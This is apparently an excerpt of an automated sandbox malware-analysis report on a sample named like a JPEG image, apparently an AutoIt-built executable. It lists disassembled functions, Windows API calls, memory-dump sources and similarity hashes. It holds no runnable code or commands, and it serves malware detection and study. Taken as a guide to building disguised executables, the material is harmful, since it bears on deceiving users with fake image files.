                                                                                                          • API ID: DeleteDestroyObject$IconWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3349847261-0
                                                                                                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                          • String ID:
                                                                                                          • API String ID: 2223660684-0
                                                                                                          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                          APIs
                                                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                          • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                          • EndPath.GDI32(?), ref: 00447336
                                                                                                          • StrokePath.GDI32(?), ref: 00447344
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 2783949968-0
                                                                                                          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                          • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2710830443-0
                                                                                                          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 146765662-0
                                                                                                          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                          • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                          • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                          APIs
                                                                                                          • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                          • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                          • __freeptd.LIBCMT ref: 0041516B
                                                                                                          • ExitThread.KERNEL32 ref: 00415173
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1454798553-0
                                                                                                          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strncmp
                                                                                                          • String ID: Q\E
                                                                                                          • API String ID: 909875538-2189900498
                                                                                                          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                          APIs
                                                                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                          • API String ID: 2652923123-3941886329
                                                                                                          • Opcode ID: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                                                                          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                          • Opcode Fuzzy Hash: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                                                                          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove_strncmp
                                                                                                          • String ID: U$\
                                                                                                          • API String ID: 2666721431-100911408
                                                                                                          • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                          • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                          • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                          • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                          • String ID: LPT
                                                                                                          • API String ID: 3035604524-1350329615
                                                                                                          • Opcode ID: d594f5019e475758e7693c5f8206312aa5aa41aafccdaeac4551e1936efcfcc9
                                                                                                          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                          • Opcode Fuzzy Hash: d594f5019e475758e7693c5f8206312aa5aa41aafccdaeac4551e1936efcfcc9
                                                                                                          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \$h
                                                                                                          • API String ID: 4104443479-677774858
                                                                                                          • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                          • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                          • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                          • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcmp
                                                                                                          • String ID: &
                                                                                                          • API String ID: 2931989736-1010288
                                                                                                          • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                          • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                          • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                          • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
